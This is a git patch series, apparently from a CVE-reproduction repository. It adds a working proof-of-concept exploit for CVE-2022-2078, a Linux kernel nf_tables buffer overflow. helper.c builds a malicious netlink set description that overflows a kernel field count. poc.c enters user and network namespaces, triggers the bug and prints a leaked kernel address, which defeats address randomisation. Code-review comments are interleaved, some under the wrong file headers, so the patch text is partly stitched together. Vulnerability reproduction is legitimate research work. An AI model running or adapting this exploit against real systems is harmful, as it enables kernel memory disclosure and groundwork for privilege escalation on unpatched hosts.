From 4da7567ee1186a0a96406f3d956d16fad2335a18 Mon Sep 17 00:00:00 2001
From: Buaazhangyp <1633059098@qq.com>
Date: Tue, 14 Mar 2023 13:38:35 +0800
Subject: [PATCH 1/2] add CVE-2022-2078
---
 cve/linux-kernel/2022/CVE-2022-2078/Makefile | 16 +
 cve/linux-kernel/2022/CVE-2022-2078/README.md | 12 +
 cve/linux-kernel/2022/CVE-2022-2078/boot.sh | 7 +
 .../2022/CVE-2022-2078/dbg_boot.sh | 7 +
 cve/linux-kernel/2022/CVE-2022-2078/helper.c | 591 ++++++++++++++++++
 cve/linux-kernel/2022/CVE-2022-2078/helper.h | 15 +
 cve/linux-kernel/2022/CVE-2022-2078/poc.c | 86 +++
 cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml | 20 +
 openkylin_list.yaml | 1 +
 9 files changed, 755 insertions(+)
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/Makefile
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/README.md
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/boot.sh
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/helper.c
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/helper.h
 create mode 100644 cve/linux-kernel/2022/CVE-2022-2078/poc.c
 create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/Makefile b/cve/linux-kernel/2022/CVE-2022-2078/Makefile
new file mode 100644
index 00000000..d6050945
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/Makefile
@@ -0,0 +1,16 @@
+all: poc.o helper.o
+ $(CC) -no-pie poc.o helper.o \
+ --include /usr/src/linux-hwe-5.15-headers-5.15.0-53/include/uapi/linux/netfilter/nf_tables.h \
+ -lmnl -lnftnl \
+ -lpthread \
+ -o poc
+
+poc.o: poc.c
+ $(CC) -c -o "$@" "$<"
+
+helper.o: helper.c
+ $(CC) -c \
+ -o "$@" "$<"
+
+clean:
+ rm -rf poc.o helper.o poc
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/README.md b/cve/linux-kernel/2022/CVE-2022-2078/README.md
new file mode 100644
index 00000000..6ff3c844
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/README.md
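Review bot: The `--include` line hard-codes one header package path, `/usr/src/linux-hwe-5.15-headers-5.15.0-53/...`, so the build breaks on any host with a different kernel-headers version; make it an overridable variable with that default, e.g. `KHDR ?= /usr/src/linux-hwe-5.15-headers-5.15.0-53` and `--include $(KHDR)/include/uapi/linux/netfilter/nf_tables.h`. `all` and `clean` are not declared phony, so a stray file named `clean` would silently disable the target; add `.PHONY: all clean`. `rm -rf` on three plain files only needs `rm -f`. Recipe lines must be tab-indented, which cannot be verified from the collapsed rendering on this page.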
@@ -0,0 +1,12 @@
+# CVE-2022-2078
+
+```
+$ ./poc
+...
+[+] get_set
+leak_buffer:
+ 0000 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 0123456789:;<=>?
+ 0010 28 00 00 00 00 02 0a 8f 68 8b a2 be 40 ac 70 8c (.......h...@.p.
+ 0020 ff ff ff ff 00 6c b5 81 .....l..
+[+] kernel=0xffffffff8c70ac40
+```
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/boot.sh b/cve/linux-kernel/2022/CVE-2022-2078/boot.sh
new file mode 100644
index 00000000..b788cd11
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/boot.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+export ORIG_PWD="$PWD"
+
+cd ../linux-kernel-study
+./boot.sh
+cd $ORIG_PWD
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh b/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh
new file mode 100644
index 00000000..930a24da
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/dbg_boot.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+export ORIG_PWD="$PWD"
+
+cd ../linux-kernel-study
+./dbg_boot.sh
+cd $ORIG_PWD
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/helper.c b/cve/linux-kernel/2022/CVE-2022-2078/helper.c
new file mode 100644
index 00000000..9312b977
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/helper.c
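Review bot: In boot.sh the `cd ../linux-kernel-study` result is not checked, and the wrapper is itself named boot.sh, so when that directory is absent the following `./boot.sh` re-executes this wrapper from the current directory and recurses until the process limit is hit; write `cd ../linux-kernel-study || exit 1`. `cd $ORIG_PWD` should quote the variable, `cd "$ORIG_PWD"`, since the saved path may contain whitespace. dbg_boot.sh has the same unchecked cd and the same self-named recursion through `./dbg_boot.sh`.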
@@ -0,0 +1,591 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+uint8_t leak_buffer[0x100];
+
+void my_nftnl_set_nlmsg_build_payload(struct nlmsghdr *nlh, char * table_name, char * set_name)
+{
+ struct nlattr *nest1;
+ struct nlattr *nest2;
+ struct nlattr *nest_elem;
+ int i;
+ int num_exprs = 0;
+
+ mnl_attr_put_strz(nlh, NFTA_SET_TABLE, table_name);
+ mnl_attr_put_strz(nlh, NFTA_SET_NAME, set_name);
+ mnl_attr_put_u32(nlh, NFTA_SET_KEY_TYPE, htonl(13));
+ mnl_attr_put_u32(nlh, NFTA_SET_KEY_LEN, htonl(sizeof(uint16_t)));
+ mnl_attr_put_u32(nlh, NFTA_SET_ID, htonl(1));
+
+ nest1 = mnl_attr_nest_start(nlh, NFTA_SET_DESC);
+
+ mnl_attr_put_u32(nlh, NFTA_SET_DESC_SIZE, htonl(20));
+
+ nest2 = mnl_attr_nest_start(nlh, 2); // NFTA_SET_DESC_CONCAT
+ for (i = 0; i < 16; i++) {
+ nest_elem = mnl_attr_nest_start(nlh, NFTA_LIST_ELEM);
+ mnl_attr_put_u32(nlh, 1, htonl(0x30+i)); // NFTA_SET_FIELD_LEN
+ mnl_attr_nest_end(nlh, nest_elem);
+ }
+
+ // overwrite field_count
+ nest_elem = mnl_attr_nest_start(nlh, NFTA_LIST_ELEM);
+ mnl_attr_put_u32(nlh, 1, htonl(40)); // NFTA_SET_FIELD_LEN
+ mnl_attr_nest_end(nlh, nest_elem);
+
+
+ mnl_attr_nest_end(nlh, nest2);
+
+ mnl_attr_nest_end(nlh, nest1);
+}
+
+void hexDump(char *desc, void *addr, int len)
+{
+ int i;
+ unsigned char buff[17];
+ unsigned char *pc = (unsigned char*)addr;
+
+ // Output description if given.
+ if (desc != NULL)
+ printf ("%s:\n", desc);
+
+ // Process every byte in the data.
+ for (i = 0; i < len; i++) {
+ // Multiple of 16 means new line (with line offset).
+
+ if ((i % 16) == 0) {
+ // Just don't print ASCII for the zeroth line.
+ if (i != 0)
+ printf(" %s\n", buff);
+
+ // Output the offset.
+ printf(" %04x ", i);
+ }
+
+ // Now the hex code for the specific character.
+ printf(" %02x", pc[i]);
+
+ // And store a printable ASCII character for later.
+ if ((pc[i] < 0x20) || (pc[i] > 0x7e)) {
+ buff[i % 16] = '.';
+ } else {
+ buff[i % 16] = pc[i];
+ }
+
+ buff[(i % 16) + 1] = '\0';
+ }
+
+ // Pad out last line if not exactly 16 characters.
+ while ((i % 16) != 0) {
+ printf(" ");
+ i++;
+ }
+
+ // And print the final ASCII bit.
+ printf(" %s\n", buff);
+}
+
+void print_nla(struct nlattr * attr) {
+ printf("nla_len : 0x%04x\n", attr->nla_len);
+ printf("nla_type: 0x%04x\n", attr->nla_type);
+ hexDump("data", (void *)attr, attr->nla_len);
+}
+
+void print_nlh(struct nlmsghdr * nlh)
+{
+ struct nlattr *attr;
+ unsigned int offset;
+
+ printf("nlmsg_len : 0x%08x\n", nlh->nlmsg_len);
+ printf("nlmsg_type : 0x%04x\n", nlh->nlmsg_type);
+ printf("nlmsg_flags: 0x%04x\n", nlh->nlmsg_flags);
+ printf("nlmsg_seq : 0x%08x\n", nlh->nlmsg_seq);
+ printf("nlmsg_pid : 0x%08x\n", nlh->nlmsg_pid);
+ printf("------------------------------------\n");
+
+ attr = ((void *)nlh + sizeof(struct nlmsghdr));
+
+ while(1)
+ {
+ print_nla(attr);
+ printf("------------------------------------\n");
+
+ // nested nlh
+ if (attr->nla_type == NFTA_SET_DESC) {
+ printf("-------- PRINTING NFTA DESC --------\n");
+ struct nlattr * ptr;
+
+ // NFTA_SET_DESC_SIZE
+ ptr = (void *)attr+4;
+ print_nla(ptr);
+ printf("------------------------------------\n");
+ ptr = mnl_attr_next(ptr);
+
+ // PRINT NFTA_LIST_ELEM
+ uint16_t desc_len = ptr->nla_len-4;
+ ptr = (void *)ptr+4;
+ for (int i=0; i < desc_len; i+=ptr->nla_len) {
+ printf("ELEM[%d]\n", i/0xc);
+ print_nla((void *)ptr+i);
+ leak_buffer[i/0xc] = *(uint8_t *)((void *)ptr+i+11);
+ printf("------------------------------------\n");
+ }
+ }
+ attr = mnl_attr_next(attr);
+
+ if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len))
+ break;
+ }
+ //hexDump("leak_buffer", leak_buffer, 40);
+ return;
+}
+void poison_tb(struct nlmsghdr * nlh)
+{
+ printf("[*] try modifying field_len\n");
+
+ const struct nlattr *attr;
+ unsigned int offset;
+
+ attr = ((void *)nlh + sizeof(struct nlmsghdr));
+
+ while(1)
+ {
+ printf("nla_len : 0x%04x\n", attr->nla_len);
+ printf("nla_type: 0x%04x\n", attr->nla_type);
+ if (attr->nla_len != 0x00d0 || attr->nla_type != 0x8009)
+ {
+ attr = mnl_attr_next(attr);
+ continue;
+ }
+
+ *(uint16_t *)((void *)attr+0xc) = 0xc4+0xc;
+ // *(uint32_t *)((void *)attr+0x1c-4) = 0xfcffffff;
+ hexDump("malicious attr", (void *)attr, attr->nla_len);
+ printf("------------------------------------\n");
+
+ attr = mnl_attr_next(attr);
+
+ if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len))
+ break;
+ }
+
+ return;
+}
+
+
+void poison_field_len(struct nlmsghdr * nlh)
+{
+ printf("[*] try modifying field_len\n");
+
+ const struct nlattr *attr;
+ unsigned int offset;
+
+ attr = ((void *)nlh + sizeof(struct nlmsghdr));
+
+ while(1)
+ {
+ printf("nla_len : 0x%04x\n", attr->nla_len);
+ printf("nla_type: 0x%04x\n", attr->nla_type);
+ if (attr->nla_len != 0x1c || attr->nla_type != 0x8009)
+ {
+ attr = mnl_attr_next(attr);
+ continue;
+ }
+
+ *(uint32_t *)((void *)attr+0x1c-4) = 0xfcffffff;
+ hexDump("malicious attr", (void *)attr, attr->nla_len);
+ printf("------------------------------------\n");
+
+ attr = mnl_attr_next(attr);
+
+ if ((uint64_t)attr >= (uint64_t)((void *)nlh + nlh->nlmsg_len))
+ break;
+ }
+
+ return;
+}
+
+static int parse_attr_cb(const struct nlattr *attr, void *data)
+{
+ int type = mnl_attr_get_type(attr);
+ printf("type: 0x%x\n", type);
+}
+
+void send_batch(struct mnl_nlmsg_batch *batch, mnl_cb_t cb_data)
+{
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ uint32_t portid;
+ int ret, batching;
+
+ nl = mnl_socket_open(NETLINK_NETFILTER);
+ if (nl == NULL) {
+ perror("mnl_socket_open");
+ exit(EXIT_FAILURE);
+ }
+
+ if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+ perror("mnl_socket_bind");
+ exit(EXIT_FAILURE);
+ }
+ portid = mnl_socket_get_portid(nl);
+
+ if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
+ mnl_nlmsg_batch_size(batch)) < 0) {
+ perror("mnl_socket_send");
+ exit(EXIT_FAILURE);
+ }
+
+ mnl_nlmsg_batch_stop(batch);
+
+ ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+ while (ret > 0) {
+ ret = mnl_cb_run(buf, ret, 0, portid, cb_data, NULL);
+ if (ret <= 0)
+ break;
+ ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+ }
+ if (ret == -1) {
+ perror("error");
+ exit(EXIT_FAILURE);
+ }
+ mnl_socket_close(nl);
+}
+
+static struct nftnl_table *setup_table(uint32_t family, char * table_name)
+{
+ struct nftnl_table *t;
+
+ t = nftnl_table_alloc();
+ if (t == NULL) {
+ perror("[!] Couldn't allocate a table");
+ exit(EXIT_FAILURE);
+ }
+
+ nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family);
+ nftnl_table_set_str(t, NFTNL_TABLE_NAME, table_name);
+
+ return t;
+}
+
+static struct nftnl_set *setup_set(uint32_t family, const char *table_name, const char *set_name)
+{
+ struct nftnl_set *s = NULL;
+
+ s = nftnl_set_alloc();
+ if (s == NULL) {
+ perror("OOM");
+ exit(EXIT_FAILURE);
+ }
+
+ nftnl_set_set_str(s, NFTNL_SET_TABLE, table_name);
+ nftnl_set_set_str(s, NFTNL_SET_NAME, set_name);
+ nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family);
+ nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, sizeof(uint16_t));
+ /* inet service type, see nftables/include/datatypes.h */
+ nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13);
+ nftnl_set_set_u32(s, NFTNL_SET_ID, 1);
+ // NFTA_SET_DESC
+ // NFTA_SET_DESC_SIZE
+ // NFTA_SET_DESC_CONCAT
+ // NFTA_SET_FIELD_LEN
+ // set NFTNL_SET_DESC_SIZE & NFTNL_SET_DESC_CONCAT == set NFTA_SET_DESC
+ nftnl_set_set_u32(s, NFTNL_SET_DESC_SIZE, 20);
+
+ nftnl_set_set_str(s, NFTNL_SET_DESC_CONCAT, "0000111122223333");
+
+ /*
+ for (int i=0; i<32; i++) {
+ nftnl_set_set_u32(s, NFTNL_SET_DESC_CONCAT, i+0x30);
+ }
+ */
+
+ return s;
+}
+
+void add_table(uint32_t family, char *table_name){
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ struct nlmsghdr *nlh;
+ uint32_t portid, seq, table_seq;
+ struct nftnl_table *t;
+ struct mnl_nlmsg_batch *batch;
+ int ret;
+
+ t = setup_table(family, table_name);
+ if (t == NULL)
+ exit(EXIT_FAILURE);
+
+ seq = time(NULL);
+ batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
+
+ nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ table_seq = seq;
+ nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+ NFT_MSG_NEWTABLE, family,
+ NLM_F_CREATE | NLM_F_ACK, seq++);
+ nftnl_table_nlmsg_build_payload(nlh, t);
+ nftnl_table_free(t);
+ mnl_nlmsg_batch_next(batch);
+
+ nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ send_batch(batch, NULL);
+
+ printf("[*] table added: %s\n", table_name);
+ return;
+}
+
+void add_set(uint32_t family, char * table_name, char * set_name){
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ struct nlmsghdr *nlh;
+ uint32_t portid, seq, set_seq;
+ struct nftnl_set * s;
+ struct mnl_nlmsg_batch *batch;
+ int ret;
+
+ s = setup_set(family, table_name, set_name);
+ if (s == NULL)
+ exit(EXIT_FAILURE);
+
+ seq = time(NULL);
+ batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
+
+ nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ set_seq = seq;
+ nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+ NFT_MSG_NEWSET, family,
+ NLM_F_CREATE | NLM_F_ACK, seq++);
+ nftnl_set_nlmsg_build_payload(nlh, s);
+ // print_nlh(nlh);
+ nftnl_set_free(s);
+ mnl_nlmsg_batch_next(batch);
+
+ nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ send_batch(batch, NULL);
+
+ printf("[*] set added: %s\n", set_name);
+ return;
+}
+void add_mal_set(uint32_t family, char * table_name, char * set_name){
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ struct nlmsghdr *nlh;
+ uint32_t portid, seq, set_seq;
+ struct nftnl_set * s;
+ struct mnl_nlmsg_batch *batch;
+ int ret;
+
+ s = setup_set(family, table_name, set_name);
+ if (s == NULL)
+ exit(EXIT_FAILURE);
+
+ seq = time(NULL);
+ batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
+
+ nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ set_seq = seq;
+ nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+ NFT_MSG_NEWSET, family,
+ NLM_F_CREATE | NLM_F_ACK, seq++);
+ //nftnl_set_nlmsg_build_payload(nlh, s);
+ my_nftnl_set_nlmsg_build_payload(nlh, table_name, set_name);
+ //print_nlh(nlh);
+ // poison_tb(nlh);
+ // poison_field_len(nlh);
+ nftnl_set_free(s);
+ mnl_nlmsg_batch_next(batch);
+
+ nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ send_batch(batch, NULL);
+
+ printf("[*] malicious set added: %s\n", set_name);
+ return;
+}
+
+static int set_cb(const struct nlmsghdr *nlh, void *data)
+{
+ struct nftnl_set *t;
+ char buf[4096];
+ uint32_t *type = data;
+
+ printf("[+] getset callback\n");
+ printf("nlh : %p\n", nlh);
+ printf("data: %p\n", data);
+
+ t = nftnl_set_alloc();
+ if (t == NULL) {
+ perror("OOM");
+ goto err;
+ }
+
+ if (nftnl_set_nlmsg_parse(nlh, t) < 0) {
+ perror("nftnl_set_nlmsg_parse");
+ goto err_free;
+ }
+ print_nlh((struct nlmsghdr *)nlh);
+
+ //nftnl_set_snprintf(buf, sizeof(buf), t, *type, 0);
+ //printf("%s\n", buf);
+
+err_free:
+ // nftnl_set_free(t);
+err:
+ return MNL_CB_OK;
+}
+
+void get_set(uint32_t family){
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ struct nlmsghdr *nlh;
+ uint32_t portid, seq, set_seq;
+ struct nftnl_set * s;
+ struct mnl_nlmsg_batch *batch;
+ int ret;
+
+ s = nftnl_set_alloc();
+ if (s == NULL)
+ exit(EXIT_FAILURE);
+
+ seq = time(NULL);
+ batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
+
+ nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+ mnl_nlmsg_batch_next(batch);
+
+ set_seq = seq;
+ nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETSET, family,
+ NLM_F_DUMP | NLM_F_ACK, seq);
+ nftnl_set_nlmsg_build_payload(nlh, s);
+ nftnl_set_free(s);
+
+ send_batch(batch, set_cb);
+
+ printf("[+] get_set\n");
+
+ return;
+}
+
+
+
+
+/*
+static int example_set_cb(const struct nlmsghdr *nlh, void *data)
+{
+ struct nftnl_set *t;
+ char buf[4096];
+ uint32_t *type = data;
+
+ printf("[+] getset callback\n");
+ printf("nlh : %p\n", nlh);
+ printf("data: %p\n", data);
+
+ t = nftnl_set_alloc();
+ if (t == NULL) {
+ perror("OOM");
+ goto err;
+ }
+
+ if (nftnl_set_nlmsg_parse(nlh, t) < 0) {
+ perror("nftnl_set_nlmsg_parse");
+ goto err_free;
+ }
+
+ print_nlh(nlh);
+ printf("end of print_nlh\n");
+err_free:
+ //nftnl_set_free(t);
+ printf("free\n");
+err:
+ return MNL_CB_OK;
+}
+
+int example_getset(uint32_t family)
+{
+ struct mnl_socket *nl;
+ char buf[MNL_SOCKET_BUFFER_SIZE];
+ struct nlmsghdr *nlh;
+ uint32_t portid, seq;
+ uint32_t type = NFTNL_OUTPUT_DEFAULT;
+ struct nftnl_set *t = NULL;
+ int ret;
+
+ t = nftnl_set_alloc();
+ if (t == NULL) {
+ perror("OOM");
+ exit(EXIT_FAILURE);
+ }
+ seq = time(NULL);
+
+ nlh = nftnl_nlmsg_build_hdr(buf, NFT_MSG_GETSET, family,
+ NLM_F_DUMP | NLM_F_ACK, seq);
+ nftnl_set_nlmsg_build_payload(nlh, t);
+ nftnl_set_free(t);
+
+ nl = mnl_socket_open(NETLINK_NETFILTER);
+ if (nl == NULL) {
+ perror("mnl_socket_open");
+ exit(EXIT_FAILURE);
+ }
+
+ if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+ perror("mnl_socket_bind");
+ exit(EXIT_FAILURE);
+ }
+ portid = mnl_socket_get_portid(nl);
+
+ if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
+ perror("mnl_socket_send");
+ exit(EXIT_FAILURE);
+ }
+
+ ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+ printf("ret: %d\n", ret);
+ while (ret > 0) {
+ ret = mnl_cb_run(buf, ret, seq, portid, example_set_cb, &type);
+ if (ret <= 0)
+ break;
+ ret = mnl_socket_recvfrom(nl, buf, sizeof(buf));
+ printf("ret: %d\n", ret);
+ }
+ if (ret == -1) {
+ perror("error");
+ exit(EXIT_FAILURE);
+ }
+ mnl_socket_close(nl);
+
+ return EXIT_SUCCESS;
+}
+*/
\ No newline at end of file
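Review bot: In print_nlh the store `leak_buffer[i/0xc] = *(uint8_t *)((void *)ptr+i+11);` is bounded only by `desc_len`, a uint16_t taken from the netlink reply, while leak_buffer holds 0x100 bytes, so a reply whose NFTA_SET_DESC_CONCAT nest exceeds 0xc00 bytes writes past the array; add `if (i/0xc >= sizeof leak_buffer) break;` before the store. The loop stride `i+=ptr->nla_len` never advances `ptr`, so every iteration steps by the first element's length rather than the current element's; take the stride from `((struct nlattr *)((void *)ptr+i))->nla_len` or advance `ptr` together with `i`. parse_attr_cb is declared `static int` but returns nothing, which is undefined behaviour if it is ever installed as an mnl callback; it should `return MNL_CB_OK;` or be removed along with the unused `offset`, `batching`, `ret` and `portid` locals. The `#include` lines show no header names on this page, which looks like the angle-bracket names being stripped in rendering rather than the committed content, but is worth confirming against the repository.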
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/helper.h b/cve/linux-kernel/2022/CVE-2022-2078/helper.h
new file mode 100644
index 00000000..8708a110
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/helper.h
@@ -0,0 +1,15 @@
+#include
+
+#include
+
+uint8_t leak_buffer[0x100];
+
+void hexDump(char *desc, void *addr, int len);
+void send_batch(struct mnl_nlmsg_batch *batch);
+static struct nftnl_table *setup_table(uint32_t family, char * table_name);
+static struct nftnl_set *setup_set(uint32_t family, const char *table_name, const char *set_name);
+
+void add_table(uint32_t family, char *table_name);
+void add_set(uint32_t family, char * table_name, char * set_name);
+void add_mal_set(uint32_t family, char * table_name, char * set_name);
+void get_set(uint32_t family);
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2078/poc.c b/cve/linux-kernel/2022/CVE-2022-2078/poc.c
new file mode 100644
index 00000000..fc05518f
--- /dev/null
+++ b/cve/linux-kernel/2022/CVE-2022-2078/poc.c
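Review bot: `uint8_t leak_buffer[0x100];` in helper.h is a definition, not a declaration, so poc.c defines the array a second time next to the definition in helper.c; with the `-fno-common` default of GCC 10 and later that is a multiple-definition link error, and even where it links the two must stay in sync by accident. Write `extern uint8_t leak_buffer[0x100];` here and keep the single definition in helper.c. The `send_batch` prototype takes one parameter while helper.c defines `void send_batch(struct mnl_nlmsg_batch *batch, mnl_cb_t cb_data)`, so any caller compiled against this header passes the wrong argument count; the header should carry the two-parameter signature. The two `static` prototypes declare functions private to helper.c, so in every other translation unit they are declared but never defined; drop them, and add an include guard.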
@@ -0,0 +1,86 @@
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+
+#include
+
+#include "helper.h"
+
+void write_to_file(const char *which, const char *format, ...) {
+ FILE * fu = fopen(which, "w");
+ va_list args;
+ va_start(args, format);
+ if (vfprintf(fu, format, args) < 0) {
+ perror("cannot write");
+ exit(1);
+ }
+ fclose(fu);
+}
+
+static int setup_sandbox(void)
+{
+ uid_t uid = getuid();
+ gid_t gid = getgid();
+
+ if (unshare(CLONE_NEWUSER) < 0)
+ {
+ perror("[-] unshare(CLONE_NEWUSER)");
+ return -1;
+ }
+
+ if (unshare(CLONE_NEWNET) < 0)
+ {
+ perror("[-] unshare(CLONE_NEWNET)");
+ return -1;
+ }
+
+ printf("[+] unshare done\n");
+
+ cpu_set_t set;
+ CPU_ZERO(&set);
+ CPU_SET(0, &set);
+ if (sched_setaffinity(getpid(), sizeof(set), &set) < 0)
+ {
+ perror("[-] sched_setaffinity");
+ return -1;
+ }
+
+ // now we map uid and gid
+ write_to_file("/proc/self/uid_map", "0 %d 1", uid);
+ // deny setgroups (see user_namespaces(7))
+ write_to_file("/proc/self/setgroups", "deny");
+ // remap gid
+ write_to_file("/proc/self/gid_map", "0 %d 1", gid);
+
+ return 0;
+}
+
+int main()
+{
+ uint64_t kernel_leak = 0;
+ uint32_t family;
+ char * table_name;
+ char * set_name;
+
+ if (setup_sandbox())
+ {
+ printf("[-] setup_sandbox() failed");
+ return -1;
+ }
+
+ family = NFPROTO_IPV4;
+ table_name = "test_table";
+ set_name = "test_set";
+ add_table(family, table_name);
+ add_mal_set(family, table_name, set_name);
+
+ // leak
+ get_set(family);
+ hexDump("leak_buffer", leak_buffer, 40);
+ kernel_leak = *(uint64_t *)((void *)leak_buffer+0x1c);
+ printf("[+] kernel=0x%016lx\n", kernel_leak);
+ //example_getset(family);
+ return 0;
+}
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
new file mode 100644
index 00000000..efe94bd8
--- /dev/null
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
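Review bot: write_to_file never checks the `fopen` result, so when one of the /proc/self map files cannot be opened `vfprintf` is handed a NULL stream, and because stdio buffers the output the kernel's rejection of a mapping surfaces only at `fclose`, whose return value is discarded, so setup_sandbox reports success with an unmapped uid or gid. `va_end` is also never called. Checking the fopen result and the fclose return and ending the va_list makes the sandbox setup fail loudly instead, as below. In main, `*(uint64_t *)((void *)leak_buffer+0x1c)` is an unaligned type-punned read of a uint8_t array; `memcpy(&kernel_leak, leak_buffer + 0x1c, sizeof kernel_leak);` avoids it, and `"%016lx"` with a uint64_t argument should be `"0x%016" PRIx64 "\n"` from inttypes.h.
```c
void write_to_file(const char *which, const char *format, ...) {
    FILE *fu = fopen(which, "w");
    if (fu == NULL) {
        perror(which);
        exit(1);
    }
    va_list args;
    va_start(args, format);
    int rc = vfprintf(fu, format, args);
    va_end(args);
    // procfs validates the mapping on write(2), which stdio defers to fclose()
    if (rc < 0 || fclose(fu) != 0) {
        perror("cannot write");
        exit(1);
    }
}
```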
@@ -0,0 +1,20 @@
+id: CVE-2022-2078
+source: https://github.com/delsploit/CVE-2022-2078
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: |
+ 在 Linux 内核的 nft_set_desc_concat_parse() 函数中发现了一个漏洞。此缺陷允许攻击者通过 nft_set_desc_concat_parse() 触发缓冲区溢出,造成拒绝服务并可能运行代码。
+ scope-of-influence:
+ Linux kernel(5.10.120-1, 5.18.2-1)
+ reference:
+ - https://bugzilla.redhat.com/show_bug.cgi?id=2096178
+ - https://www.openwall.com/lists/oss-security/2022/06/02/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 5.5
+ cve-id: CVE-2022-2078
+ cwe-id: CWE-120
+ cnvd-id: None
+ kve-id: None
+ tags: 缓冲区溢出,拒绝服务
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 127b8584..3bf855fd 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -39,6 +39,7 @@ cve:
 - CVE-2021-41073
 - CVE-2022-0435
 - CVE-2021-26708
+ - CVE-2022-2078
 sudo:
 - CVE-2021-3156
 - CVE-2023-22809
-- Gitee
From 9b211f36cf3c99f310c87d7fe4125f8d7fc3afe3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BC=A0=E8=8B=B1=E9=B9=8F?=
Date: Tue, 14 Mar 2023 07:32:03 +0000
Subject: [PATCH 2/2] update cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml.
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: 张英鹏
---
 cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
index efe94bd8..fd30d43a 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2078.yaml
@@ -14,7 +14,7 @@ info:
 cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
